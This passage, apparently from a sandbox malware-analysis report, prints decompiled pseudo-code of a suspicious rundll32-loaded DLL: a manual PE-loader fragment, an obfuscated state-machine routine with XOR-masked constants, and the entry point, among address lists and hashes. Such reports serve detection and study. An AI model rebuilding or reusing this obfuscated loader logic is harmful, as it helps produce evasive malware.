																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}





























                                                                                                                          0x10002286
                                                                                                                          0x10002289
                                                                                                                          0x10002290
                                                                                                                          0x100022a7
                                                                                                                          0x100022b3
                                                                                                                          0x100022c1
                                                                                                                          0x100022d8
                                                                                                                          0x100022f0
                                                                                                                          0x100022ff
                                                                                                                          0x10002302
                                                                                                                          0x1000230e
                                                                                                                          0x1000232f
                                                                                                                          0x1000234c
                                                                                                                          0x1000236e
                                                                                                                          0x10002377
                                                                                                                          0x1000237a
                                                                                                                          0x10002395
                                                                                                                          0x100023a8
                                                                                                                          0x100023c4
                                                                                                                          0x100023aa
                                                                                                                          0x100023b3
                                                                                                                          0x100023b3
                                                                                                                          0x100023cd
                                                                                                                          0x100023d2
                                                                                                                          0x100023d2
                                                                                                                          0x10002389
                                                                                                                          0x10002392
                                                                                                                          0x10002392
                                                                                                                          0x100023db
                                                                                                                          0x100023ea
                                                                                                                          0x100023f8
                                                                                                                          0x10002401
                                                                                                                          0x10002412
                                                                                                                          0x10002438
                                                                                                                          0x1000243e
                                                                                                                          0x10002445
                                                                                                                          0x10002472
                                                                                                                          0x10002483
                                                                                                                          0x1000248a
                                                                                                                          0x100024b2
                                                                                                                          0x100024c4
                                                                                                                          0x100024cb
                                                                                                                          0x100024d4
                                                                                                                          0x100024dd
                                                                                                                          0x100024e6
                                                                                                                          0x100024ef
                                                                                                                          0x100024f8
                                                                                                                          0x10002510
                                                                                                                          0x1000252e
                                                                                                                          0x10002534
                                                                                                                          0x10002546
                                                                                                                          0x10002554
                                                                                                                          0x1000255a
                                                                                                                          0x10002564
                                                                                                                          0x1000257a
                                                                                                                          0x10002581
                                                                                                                          0x10002598
                                                                                                                          0x1000259b
                                                                                                                          0x1000259e
                                                                                                                          0x100025bb
                                                                                                                          0x100025a0
                                                                                                                          0x100025b3
                                                                                                                          0x100025b3
                                                                                                                          0x100025d0
                                                                                                                          0x100025e3
                                                                                                                          0x100025ea
                                                                                                                          0x10002604
                                                                                                                          0x10002616
                                                                                                                          0x10002680
                                                                                                                          0x10002687
                                                                                                                          0x00000000
                                                                                                                          0x10002687
                                                                                                                          0x1000261f
                                                                                                                          0x10002678
                                                                                                                          0x1000267b
                                                                                                                          0x00000000
                                                                                                                          0x1000267b
                                                                                                                          0x1000262c
                                                                                                                          0x1000262f
                                                                                                                          0x10002635
                                                                                                                          0x1000263c
                                                                                                                          0x10002646
                                                                                                                          0x1000264d
                                                                                                                          0x10002661
                                                                                                                          0x00000000
                                                                                                                          0x10002661
                                                                                                                          0x10002654
                                                                                                                          0x1000268c
                                                                                                                          0x10002693
                                                                                                                          0x00000000
                                                                                                                          0x10002698
                                                                                                                          0x00000000
                                                                                                                          0x10002606
                                                                                                                          0x00000000
                                                                                                                          0x100025ec
                                                                                                                          0x00000000
                                                                                                                          0x100025d2
                                                                                                                          0x00000000
                                                                                                                          0x10002583
                                                                                                                          0x00000000
                                                                                                                          0x10002512
                                                                                                                          0x10002497
                                                                                                                          0x1000249f
                                                                                                                          0x00000000
                                                                                                                          0x100024a5
                                                                                                                          0x10002454
                                                                                                                          0x1000245a
                                                                                                                          0x10002461
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002465
                                                                                                                          0x00000000
                                                                                                                          0x1000246b
                                                                                                                          0x10002419
                                                                                                                          0x00000000
                                                                                                                          0x1000241f
                                                                                                                          0x10002353
                                                                                                                          0x00000000
                                                                                                                          0x10002359
                                                                                                                          0x10002336
                                                                                                                          0x00000000
                                                                                                                          0x1000233c
                                                                                                                          0x10002315
                                                                                                                          0x00000000
                                                                                                                          0x1000231b
                                                                                                                          0x00000000
                                                                                                                          0x100022f2
                                                                                                                          0x100022c8
                                                                                                                          0x00000000
                                                                                                                          0x100022ce
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                          • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                          • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079F8FD Relevance: 10.4, Strings: 8, Instructions: 353COMMONCrypto
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 148 79f8fd-79fddc 149 79fde0-79fde6 148->149 150 79fdec-79fdf2 149->150 151 79ffa3-79ffbe call 794b61 149->151 153 79fdf8-79fdfe 150->153 154 79ffd1-79ffe9 call 79ab87 150->154 159 79ffc3-79ffc9 151->159 157 79ff5e-79ff64 153->157 158 79fe04-79fe0a 153->158 160 79ffee-79fff3 154->160 161 79ff99-79ff9e 157->161 162 79ff66-79ff6a 157->162 163 79ff49-79ff59 call 79f899 158->163 164 79fe10-79fe16 158->164 159->149 167 79ffcf 159->167 169 79fff4-7a0000 160->169 161->149 170 79ff6c-79ff73 162->170 171 79ff91-79ff97 162->171 163->149 165 79fe18-79fe1e 164->165 166 79fe8f-79feae call 7a46bb 164->166 165->159 172 79fe24-79fe5e call 7adcf7 call 79b23c 165->172 177 79feb3-79ff44 call 7ada22 call 7adcf7 call 7947ce call 79a8b0 166->177 167->169 175 79ff81-79ff8a 170->175 171->161 171->162 185 79fe63-79fe8a call 79a8b0 172->185 178 79ff8c-79ff8e 175->178 179 79ff75-79ff79 175->179 177->149 178->171 179->178 181 79ff7b-79ff7e 179->181 181->175 185->159
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E0079F8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E0079AB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E0079F899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E007A46BB(_v1672, _v1620); // executed
						E007ADA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E007947CE( &_v520, _v1684, _v1640, _v1596, _v1568, E007ADCF7(_v1640, 0x791140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E0079A8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E0079B23C(_v1572, _v1576, E007ADCF7(_v1644, 0x7910c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E0079A8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E00794B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}




























































                                                                                                                          0x0079f8fd
                                                                                                                          0x0079f903
                                                                                                                          0x0079f90d
                                                                                                                          0x0079f917
                                                                                                                          0x0079f91c
                                                                                                                          0x0079f927
                                                                                                                          0x0079f929
                                                                                                                          0x0079f92c
                                                                                                                          0x0079f931
                                                                                                                          0x0079f935
                                                                                                                          0x0079f93d
                                                                                                                          0x0079f945
                                                                                                                          0x0079f94d
                                                                                                                          0x0079f952
                                                                                                                          0x0079f95a
                                                                                                                          0x0079f96a
                                                                                                                          0x0079f96e
                                                                                                                          0x0079f973
                                                                                                                          0x0079f97b
                                                                                                                          0x0079f983
                                                                                                                          0x0079f98d
                                                                                                                          0x0079f98e
                                                                                                                          0x0079f997
                                                                                                                          0x0079f99b
                                                                                                                          0x0079f9a3
                                                                                                                          0x0079f9ab
                                                                                                                          0x0079f9b3
                                                                                                                          0x0079f9bb
                                                                                                                          0x0079f9c3
                                                                                                                          0x0079f9cb
                                                                                                                          0x0079f9d3
                                                                                                                          0x0079f9db
                                                                                                                          0x0079f9e3
                                                                                                                          0x0079f9f0
                                                                                                                          0x0079f9f4
                                                                                                                          0x0079f9fe
                                                                                                                          0x0079fa02
                                                                                                                          0x0079fa0a
                                                                                                                          0x0079fa15
                                                                                                                          0x0079fa20
                                                                                                                          0x0079fa2b
                                                                                                                          0x0079fa36
                                                                                                                          0x0079fa41
                                                                                                                          0x0079fa4c
                                                                                                                          0x0079fa54
                                                                                                                          0x0079fa5c
                                                                                                                          0x0079fa64
                                                                                                                          0x0079fa71
                                                                                                                          0x0079fa75
                                                                                                                          0x0079fa7d
                                                                                                                          0x0079fa85
                                                                                                                          0x0079fa8d
                                                                                                                          0x0079fa95
                                                                                                                          0x0079faa0
                                                                                                                          0x0079faa4
                                                                                                                          0x0079faac
                                                                                                                          0x0079fab7
                                                                                                                          0x0079fabf
                                                                                                                          0x0079fac6
                                                                                                                          0x0079fad1
                                                                                                                          0x0079fae1
                                                                                                                          0x0079fae6
                                                                                                                          0x0079faf0
                                                                                                                          0x0079faf5
                                                                                                                          0x0079fafb
                                                                                                                          0x0079fb03
                                                                                                                          0x0079fb0b
                                                                                                                          0x0079fb18
                                                                                                                          0x0079fb1b
                                                                                                                          0x0079fb1f
                                                                                                                          0x0079fb27
                                                                                                                          0x0079fb2f
                                                                                                                          0x0079fb37
                                                                                                                          0x0079fb3f
                                                                                                                          0x0079fb47
                                                                                                                          0x0079fb4f
                                                                                                                          0x0079fb57
                                                                                                                          0x0079fb5f
                                                                                                                          0x0079fb6c
                                                                                                                          0x0079fb70
                                                                                                                          0x0079fb78
                                                                                                                          0x0079fb84
                                                                                                                          0x0079fb89
                                                                                                                          0x0079fb8f
                                                                                                                          0x0079fb93
                                                                                                                          0x0079fb9b
                                                                                                                          0x0079fba3
                                                                                                                          0x0079fbab
                                                                                                                          0x0079fbb3
                                                                                                                          0x0079fbc0
                                                                                                                          0x0079fbc3
                                                                                                                          0x0079fbc7
                                                                                                                          0x0079fbcf
                                                                                                                          0x0079fbd7
                                                                                                                          0x0079fbdf
                                                                                                                          0x0079fbe7
                                                                                                                          0x0079fbef
                                                                                                                          0x0079fbf7
                                                                                                                          0x0079fbff
                                                                                                                          0x0079fc04
                                                                                                                          0x0079fc0c
                                                                                                                          0x0079fc14
                                                                                                                          0x0079fc24
                                                                                                                          0x0079fc28
                                                                                                                          0x0079fc30
                                                                                                                          0x0079fc43
                                                                                                                          0x0079fc44
                                                                                                                          0x0079fc4b
                                                                                                                          0x0079fc56
                                                                                                                          0x0079fc61
                                                                                                                          0x0079fc6c
                                                                                                                          0x0079fc77
                                                                                                                          0x0079fc87
                                                                                                                          0x0079fc91
                                                                                                                          0x0079fc96
                                                                                                                          0x0079fc9c
                                                                                                                          0x0079fca4
                                                                                                                          0x0079fcac
                                                                                                                          0x0079fcb4
                                                                                                                          0x0079fcb9
                                                                                                                          0x0079fcc1
                                                                                                                          0x0079fccc
                                                                                                                          0x0079fcd7
                                                                                                                          0x0079fce2
                                                                                                                          0x0079fcea
                                                                                                                          0x0079fcf6
                                                                                                                          0x0079fcf9
                                                                                                                          0x0079fcfd
                                                                                                                          0x0079fd05
                                                                                                                          0x0079fd0d
                                                                                                                          0x0079fd1a
                                                                                                                          0x0079fd1e
                                                                                                                          0x0079fd23
                                                                                                                          0x0079fd2b
                                                                                                                          0x0079fd36
                                                                                                                          0x0079fd3e
                                                                                                                          0x0079fd49
                                                                                                                          0x0079fd51
                                                                                                                          0x0079fd59
                                                                                                                          0x0079fd61
                                                                                                                          0x0079fd69
                                                                                                                          0x0079fd6e
                                                                                                                          0x0079fd76
                                                                                                                          0x0079fd7b
                                                                                                                          0x0079fd83
                                                                                                                          0x0079fd8b
                                                                                                                          0x0079fd93
                                                                                                                          0x0079fd9b
                                                                                                                          0x0079fda8
                                                                                                                          0x0079fdac
                                                                                                                          0x0079fdb4
                                                                                                                          0x0079fdbc
                                                                                                                          0x0079fdc4
                                                                                                                          0x0079fdcc
                                                                                                                          0x0079fdd4
                                                                                                                          0x0079fddc
                                                                                                                          0x0079fde0
                                                                                                                          0x0079fdf2
                                                                                                                          0x0079ffd1
                                                                                                                          0x0079ffd5
                                                                                                                          0x0079ffd6
                                                                                                                          0x0079ffd7
                                                                                                                          0x0079ffd8
                                                                                                                          0x0079ffd9
                                                                                                                          0x0079ffe8
                                                                                                                          0x0079ffe9
                                                                                                                          0x0079fff3
                                                                                                                          0x0079fff3
                                                                                                                          0x0079fff7
                                                                                                                          0x007a0000
                                                                                                                          0x007a0000
                                                                                                                          0x0079fdfe
                                                                                                                          0x0079ff5e
                                                                                                                          0x0079ff60
                                                                                                                          0x0079ff64
                                                                                                                          0x0079ff99
                                                                                                                          0x0079ff99
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff66
                                                                                                                          0x0079ff66
                                                                                                                          0x0079ff66
                                                                                                                          0x0079ff6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff6c
                                                                                                                          0x0079ff81
                                                                                                                          0x0079ff81
                                                                                                                          0x0079ff84
                                                                                                                          0x0079ff87
                                                                                                                          0x0079ff8a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff75
                                                                                                                          0x0079ff79
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff7b
                                                                                                                          0x0079ff7e
                                                                                                                          0x0079ff7e
                                                                                                                          0x0079ff7e
                                                                                                                          0x0079ff8c
                                                                                                                          0x0079ff8c
                                                                                                                          0x0079ff8e
                                                                                                                          0x0079ff91
                                                                                                                          0x0079ff91
                                                                                                                          0x0079ff94
                                                                                                                          0x0079ff94
                                                                                                                          0x00000000
                                                                                                                          0x0079ff66
                                                                                                                          0x0079fe0a
                                                                                                                          0x0079ff52
                                                                                                                          0x0079ff54
                                                                                                                          0x00000000
                                                                                                                          0x0079ff54
                                                                                                                          0x0079fe16
                                                                                                                          0x0079fe8f
                                                                                                                          0x0079fe9a
                                                                                                                          0x0079fe9e
                                                                                                                          0x0079fead
                                                                                                                          0x0079feae
                                                                                                                          0x0079fecf
                                                                                                                          0x0079fed4
                                                                                                                          0x0079fee0
                                                                                                                          0x0079ff22
                                                                                                                          0x0079ff2e
                                                                                                                          0x0079ff37
                                                                                                                          0x0079ff3c
                                                                                                                          0x0079ff3f
                                                                                                                          0x00000000
                                                                                                                          0x0079ff3f
                                                                                                                          0x0079fe18
                                                                                                                          0x0079fe1e
                                                                                                                          0x0079fe24
                                                                                                                          0x0079fe2d
                                                                                                                          0x0079fe5e
                                                                                                                          0x0079fe6a
                                                                                                                          0x0079fe74
                                                                                                                          0x0079fe7c
                                                                                                                          0x0079fe82
                                                                                                                          0x0079fe87
                                                                                                                          0x0079fe87
                                                                                                                          0x0079ffc3
                                                                                                                          0x0079ffc9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ffcf
                                                                                                                          0x0079ffb7
                                                                                                                          0x0079ffbd
                                                                                                                          0x0079ffbe
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID: '+=$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                          • API String ID: 1514166925-385937
                                                                                                                          • Opcode ID: 876d2dc88ead2b25d36b54b895e865d59165060fb2897e50947993244aa4c21c
                                                                                                                          • Instruction ID: ef1c5dcd9484d2fa89f26482f1c5582fc736270248cffe6c4b645b028807eda8
                                                                                                                          • Opcode Fuzzy Hash: 876d2dc88ead2b25d36b54b895e865d59165060fb2897e50947993244aa4c21c
                                                                                                                          • Instruction Fuzzy Hash: 740220725083809FD768CF25D58AA1BBBE2FBC5718F108A1DF19986260D7B98949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079E991 Relevance: 2.6, Strings: 2, Instructions: 68COMMONCrypto
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 267 79e991-79ea60 268 79ea90-79ea96 267->268 269 79ea62-79ea77 call 79f8fd 267->269 269->268 272 79ea79-79ea88 call 7993ed 269->272 274 79ea8d 272->274 274->268
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x7b320c = _a4;
					if(E0079F8FD() != 0) {
						E007993ED(); // executed
					}
				}
				return 1;
			}
















                                                                                                                          0x0079e997
                                                                                                                          0x0079e99d
                                                                                                                          0x0079e9a4
                                                                                                                          0x0079e9ab
                                                                                                                          0x0079e9b2
                                                                                                                          0x0079e9b9
